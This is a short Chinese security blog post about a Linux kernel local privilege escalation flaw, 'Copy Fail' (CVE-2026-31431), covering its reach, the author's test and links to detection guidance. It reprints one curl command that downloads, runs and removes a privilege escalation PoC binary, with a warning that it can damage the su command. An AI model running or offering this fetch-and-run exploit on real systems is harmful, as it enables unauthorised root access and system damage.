Copy Fail(CVE-2026-31431):732字节脚本提权linux
网安杂谈 2026-05-01 13:37 山东

近期披露的Linux内核高危本地提权漏洞(Copy Fail,CVE-2026-31431)由 Xint Code 团队发现,源于一处隐蔽且易触发的内核逻辑缺陷。攻击者在具备本地访问条件下,可稳定实现权限提升并获取系统最高权限。
该漏洞利用代码(PoC)已公开,显著降低攻击门槛。其影响可追溯至 2017 年,覆盖主流 Linux 发行版,并波及云服务器、容器宿主机、多租户环境以及各类基于 Linux 的嵌入式设备(如物联网终端、工控设备和网络设备),整体风险范围广、危害等级高。
利用demo视频来自Copy Fail (CVE-2026-31431) 官网
看资料觉得该漏洞的利用相当简单,于是翻出一个陈年centos镜像(3.10.0-1160.66.1.el7.x86_64)仿真起来试了试,竟然不受影响(版本太老了)!后面再找个嵌入式设备的镜像试一试。
人工验真!Linux提权漏洞,影响这么多信创!(附稳定验证PoC)
微步给的验证POC(注意禁止在线上环境进行验证,验证程序可能会损坏系统的su命令内存映像):
curl -fsSL https://onesandbox-release.threatbook.cn/poc/CVE-2026-31431/copyfail -o /tmp/copyfail && chmod +x /tmp/copyfail && /tmp/copyfail && rm -f /tmp/copyfail
在某些取证场景下,确实还挺有用的。
那么如何发现该漏洞利用的痕迹呢?参考安天科技的分析:
CVE-2026-31431(Copy Fail)漏洞FAQ(上)——漏洞的基本情况、影响范围与处置篇
CVE-2026-31431(Copy Fail)漏洞FAQ(下)——漏洞技术机理、历史坐标与战略启示篇
自动化利用工具肯定也已经出来了,大家做好防护,五一劳动节快乐!